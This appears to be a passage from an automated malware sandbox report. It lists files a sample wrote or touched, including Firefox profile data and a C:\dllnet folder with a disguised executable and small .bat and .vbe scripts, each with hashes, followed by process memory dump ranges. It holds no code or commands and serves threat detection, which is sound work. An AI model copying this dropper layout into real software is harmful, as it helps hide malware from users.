                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\b681ed48-7d1c-4a51-806a-8e304f19a764

                              Filesize

                              982B

                              MD5

                              c7e509b465a1f8017b45f6ecbab13865

                              SHA1

                              cc1e17d59521d2b27e46f3a0ca6f9490dcfddefa

                              SHA256

                              f4480158b541232f48144832c180350ee54e0a8d854bbf8a4adcf561fab5b7a8

                              SHA512

                              255ad26ce2cd8950d765445075fe5c50609fa1b45885f01e80b50c1f6e9d0600dc9fd1dc70fe26dc4ace309c720b299e8c2ac87ae47620533fcd3235e63566c9

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\bb5d9ae0-0823-4780-b148-13499f735fcc

                              Filesize

                              28KB

                              MD5

                              c83264b6b26db24cd8b89df9931c08c0

                              SHA1

                              80ecfc1142c38999a56041b11c24a8d7424e4527

                              SHA256

                              f5689e9fa451d1819d4d021924f2597f7dae9b7c7425e5bcba85fd82804ec90f

                              SHA512

                              fe2d0de1e9e04d1641c87cac0c83dd2c1406880f4ffa80fd8db1fbfaf500a86ad6883e3b5ea961fa40c2581418d2343fb3f8d2aea746dce1146598aa27c44101

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                              Filesize

                              1.1MB

                              MD5

                              842039753bf41fa5e11b3a1383061a87

                              SHA1

                              3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                              SHA256

                              d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                              SHA512

                              d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                              Filesize

                              116B

                              MD5

                              2a461e9eb87fd1955cea740a3444ee7a

                              SHA1

                              b10755914c713f5a4677494dbe8a686ed458c3c5

                              SHA256

                              4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                              SHA512

                              34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                              Filesize

                              372B

                              MD5

                              bf957ad58b55f64219ab3f793e374316

                              SHA1

                              a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                              SHA256

                              bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                              SHA512

                              79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                              Filesize

                              17.8MB

                              MD5

                              daf7ef3acccab478aaa7d6dc1c60f865

                              SHA1

                              f8246162b97ce4a945feced27b6ea114366ff2ad

                              SHA256

                              bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                              SHA512

                              5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

                              Filesize

                              10KB

                              MD5

                              eba5a0ba83ed189170e6618200fbc160

                              SHA1

                              27542d404e784d32713e6be25b5c00863aaa8e2e

                              SHA256

                              aab9da1e48dd2bea3be126ebf4c99cb17dd50c33b145e51b3476edc803329f8a

                              SHA512

                              68c859c3762e99782cf68ceef3c55e95ed187d3ad06de714932bc2e5c941f2902d175890a143d9380a2903f98ddc87d14ebf84c24cefa53cb2872d1e9eb9d9bf

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

                              Filesize

                              12KB

                              MD5

                              96c9517b7635b99252c285823a63b02d

                              SHA1

                              4e9aaa1f8991218777857fd3a87924f700b427c8

                              SHA256

                              47c64bf181546e7d29ec0232c9bfd8a7b77c651791dfcff88d48c07c04ade994

                              SHA512

                              af1d9e4d39ce4514c714851f608f423d6617cf0e3504232c8b94c4727e6ddb744b0f32293b4db287ff2f7efbb10785dd0da793024e2dedd898ef44ba0a267c52

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

                              Filesize

                              15KB

                              MD5

                              57e40509dfe2f94b42697dcba0b3c45e

                              SHA1

                              581a84d4cdfbc1e2a258b4272fc8970e9175133c

                              SHA256

                              77c22df33051a66a8baeeba16ac39fdd81275485995899dadf9a39aecd9bd65b

                              SHA512

                              526b2ff2603c090a2a09559bb330642bef10ead8c559b90394513d46fb3918f731ac370346801f09bd606121e7e4dff54a1546c81dc6e00204c7d774113a0610

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs.js

                              Filesize

                              10KB

                              MD5

                              75b53a507a7996402147450605297914

                              SHA1

                              442938aa4812a799f467f8a14d2739e3786e5905

                              SHA256

                              0710c0ff6bc9053ca24845e7d6138a0212c4b3bd526618f942402090e9d8a9ae

                              SHA512

                              c8239de17a22b7bbf8ad193e18aa8386d60f6973ed609117f7a1680207d54ad40cdc1971f92cbf602fe68fde29c0ee32364608bd5c71934d96f5d6abf31d1d0e

                            • C:\dllnet\HyperServerFontdll.exe

                              Filesize

                              3.3MB

                              MD5

                              1ea029e7274746e01f4c285d638f2a1c

                              SHA1

                              1e582b370a95fe21c9a55d317830cb6f5a2d8e6b

                              SHA256

                              eeddee0a57a540792aac5854451c760ccf3912db09a0dfbebbd5a175413587ed

                              SHA512

                              99d16c1626b7e48a5f7303fa8595dbc9544383b6734904e39c0b8e20fc90c6229d18ee544b95d1a54236f74bb59af25f2f9eb0681a2acf8e392d244cf31e90d4

                            • C:\dllnet\J0k4As.bat

                              Filesize

                              203B

                              MD5

                              eecba84beeb16a6f77a1345dc5c50d9a

                              SHA1

                              76c75599399493be5fa20e6065cf72ef05e238a0

                              SHA256

                              31a4b66ee13c7872264957aaa0bc36fcb780473e7d6096853f20ad45b541696e

                              SHA512

                              54e38ff09bf1e3fb8a7582c81acf2a329d039e85c2309624fd4209decded578b5db16e4e0a6325e476ee97228849431f5229bb8d21b0263ab1d955619ba4c75f

                            • C:\dllnet\yLU75wsHgukerTkv.vbe

                              Filesize

                              201B

                              MD5

                              cbbe2c3d8f2c923ccac8ef7d747b8a20

                              SHA1

                              b308635869370794019b9337dd326d97f79ee094

                              SHA256

                              c4f65a5c34ae749bd3dbaba98e14a5443e4a84a8aa48800c29c6fc3df8739d7c

                              SHA512

                              6451e45b0bfd329d89ee4f8b696fb20739619038471d9401dde5cd174df24f0b82bd3715e8910bece8542639638d846f9f16317b695f1f00832cf790d106b0eb

                            • memory/752-264-0x00000000060D0000-0x000000000611C000-memory.dmp

                              Filesize

                              304KB

                            • memory/752-259-0x00000000059B0000-0x0000000005D04000-memory.dmp

                              Filesize

                              3.3MB

                            • memory/1088-345-0x0000000000B50000-0x00000000011CC000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/1088-298-0x0000000000B50000-0x00000000011CC000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/1444-4437-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-4440-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-4447-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-1192-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-165-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-1244-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-2549-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-906-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-94-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-4458-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-4456-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-4452-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-32-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-75-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-4450-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/1444-346-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/2212-120-0x00000000004A0000-0x0000000000752000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/2212-49-0x00000000004A0000-0x0000000000752000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/2212-131-0x00000000004A0000-0x0000000000752000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/2212-51-0x00000000004A0000-0x0000000000752000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/2212-50-0x00000000004A0000-0x0000000000752000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/2840-39-0x0000000000130000-0x00000000005E6000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/2840-40-0x0000000000130000-0x00000000005E6000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/2848-268-0x00000000021E0000-0x0000000002237000-memory.dmp

                              Filesize

                              348KB

                            • memory/3184-35-0x0000000000370000-0x0000000000688000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/3184-21-0x0000000000370000-0x0000000000688000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/3428-74-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/4076-45-0x0000000000780000-0x0000000000E23000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/4076-44-0x0000000000780000-0x0000000000E23000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/4332-1172-0x0000000000400000-0x0000000000C83000-memory.dmp

                              Filesize

                              8.5MB

                            • memory/4332-121-0x0000000000400000-0x0000000000C83000-memory.dmp

                              Filesize

                              8.5MB

                            • memory/4332-1186-0x0000000000400000-0x0000000000C83000-memory.dmp

                              Filesize

                              8.5MB

                            • memory/4332-135-0x0000000010000000-0x000000001001C000-memory.dmp

                              Filesize

                              112KB

                            • memory/4332-247-0x0000000000400000-0x0000000000C83000-memory.dmp

                              Filesize

                              8.5MB

                            • memory/4332-351-0x0000000000400000-0x0000000000C83000-memory.dmp

                              Filesize

                              8.5MB

                            • memory/4332-248-0x0000000000400000-0x0000000000C83000-memory.dmp

                              Filesize

                              8.5MB

                            • memory/4408-322-0x000000001C6F0000-0x000000001C6FE000-memory.dmp

                              Filesize

                              56KB

                            • memory/4408-279-0x00000000003C0000-0x000000000070A000-memory.dmp

                              Filesize

                              3.3MB

                            • memory/4408-290-0x000000001B560000-0x000000001B586000-memory.dmp

                              Filesize

                              152KB

                            • memory/4408-300-0x000000001B230000-0x000000001B24C000-memory.dmp

                              Filesize

                              112KB

                            • memory/4408-301-0x000000001B210000-0x000000001B22C000-memory.dmp

                              Filesize

                              112KB

                            • memory/4408-302-0x000000001C700000-0x000000001C750000-memory.dmp

                              Filesize

                              320KB

                            • memory/4408-330-0x000000001C8A0000-0x000000001C8EE000-memory.dmp

                              Filesize

                              312KB

                            • memory/4408-328-0x000000001C7D0000-0x000000001C7E8000-memory.dmp

                              Filesize

                              96KB

                            • memory/4408-326-0x000000001C7A0000-0x000000001C7AE000-memory.dmp

                              Filesize

                              56KB

                            • memory/4408-324-0x000000001C790000-0x000000001C7A0000-memory.dmp

                              Filesize

                              64KB

                            • memory/4408-304-0x000000001B1C0000-0x000000001B1D0000-memory.dmp

                              Filesize

                              64KB

                            • memory/4408-318-0x000000001C6E0000-0x000000001C6F0000-memory.dmp

                              Filesize

                              64KB

                            • memory/4408-320-0x000000001C7F0000-0x000000001C84A000-memory.dmp

                              Filesize

                              360KB

                            • memory/4408-316-0x000000001C770000-0x000000001C786000-memory.dmp

                              Filesize

                              88KB

                            • memory/4408-310-0x000000001B240000-0x000000001B24E000-memory.dmp

                              Filesize

                              56KB

                            • memory/4408-314-0x000000001C6D0000-0x000000001C6E0000-memory.dmp

                              Filesize

                              64KB

                            • memory/4408-312-0x000000001C750000-0x000000001C762000-memory.dmp

                              Filesize

                              72KB

                            • memory/4408-306-0x000000001C6B0000-0x000000001C6C8000-memory.dmp

                              Filesize

                              96KB

                            • memory/4408-308-0x000000001B230000-0x000000001B240000-memory.dmp

                              Filesize

                              64KB

                            • memory/4664-141-0x0000000009040000-0x000000000905E000-memory.dmp

                              Filesize

                              120KB

                            • memory/4664-195-0x0000000008F50000-0x0000000008F9C000-memory.dmp

                              Filesize

                              304KB

                            • memory/4664-95-0x00000000007F0000-0x0000000000C52000-memory.dmp

                              Filesize

                              4.4MB

                            • memory/4664-96-0x00000000007F0000-0x0000000000C52000-memory.dmp

                              Filesize

                              4.4MB

                            • memory/4664-97-0x00000000007F0000-0x0000000000C52000-memory.dmp

                              Filesize

                              4.4MB

                            • memory/4664-98-0x00000000075A0000-0x0000000007B44000-memory.dmp

                              Filesize

                              5.6MB

                            • memory/4664-100-0x0000000007390000-0x0000000007422000-memory.dmp

                              Filesize

                              584KB

                            • memory/4664-101-0x0000000007320000-0x000000000732A000-memory.dmp

                              Filesize

                              40KB

                            • memory/4664-125-0x0000000008590000-0x00000000085F6000-memory.dmp

                              Filesize

                              408KB

                            • memory/4664-230-0x00000000007F0000-0x0000000000C52000-memory.dmp

                              Filesize

                              4.4MB

                            • memory/4664-124-0x00000000084F0000-0x000000000858C000-memory.dmp

                              Filesize

                              624KB

                            • memory/4664-139-0x0000000009060000-0x00000000090D6000-memory.dmp

                              Filesize

                              472KB

                            • memory/4664-140-0x0000000008FE0000-0x0000000008FEE000-memory.dmp

                              Filesize

                              56KB

                            • memory/4664-157-0x00000000093D0000-0x00000000094F2000-memory.dmp

                              Filesize

                              1.1MB

                            • memory/4664-164-0x00000000007F0000-0x0000000000C52000-memory.dmp

                              Filesize

                              4.4MB

                            • memory/4664-194-0x000000000A0A0000-0x000000000A3F4000-memory.dmp

                              Filesize

                              3.3MB

                            • memory/4700-246-0x0000000000540000-0x00000000009EB000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/4700-266-0x0000000000540000-0x00000000009EB000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/4732-227-0x0000000006C40000-0x0000000006C62000-memory.dmp

                              Filesize

                              136KB

                            • memory/4732-221-0x0000000005580000-0x00000000055E6000-memory.dmp

                              Filesize

                              408KB

                            • memory/4732-168-0x0000000004E00000-0x0000000005428000-memory.dmp

                              Filesize

                              6.2MB

                            • memory/4732-167-0x0000000002170000-0x00000000021A6000-memory.dmp

                              Filesize

                              216KB

                            • memory/4732-223-0x0000000005A80000-0x0000000005A9E000-memory.dmp

                              Filesize

                              120KB

                            • memory/4732-224-0x00000000072C0000-0x000000000793A000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/4732-225-0x0000000005FB0000-0x0000000005FCA000-memory.dmp

                              Filesize

                              104KB

                            • memory/4732-226-0x0000000006CE0000-0x0000000006D76000-memory.dmp

                              Filesize

                              600KB

                            • memory/4732-220-0x0000000005460000-0x0000000005482000-memory.dmp

                              Filesize

                              136KB

                            • memory/5140-4439-0x000000001C2C0000-0x000000001C32B000-memory.dmp

                              Filesize

                              428KB

                            • memory/5140-1199-0x000000001C2C0000-0x000000001C32B000-memory.dmp

                              Filesize

                              428KB

                            • memory/5916-1171-0x0000000000CC0000-0x0000000000F76000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/5916-1204-0x0000000000CC0000-0x0000000000F76000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/5916-1201-0x0000000000CC0000-0x0000000000F76000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/5916-1169-0x0000000000CC0000-0x0000000000F76000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/5916-1170-0x0000000000CC0000-0x0000000000F76000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/5940-1798-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/6956-4455-0x0000000000140000-0x0000000000458000-memory.dmp

                              Filesize

                              3.1MB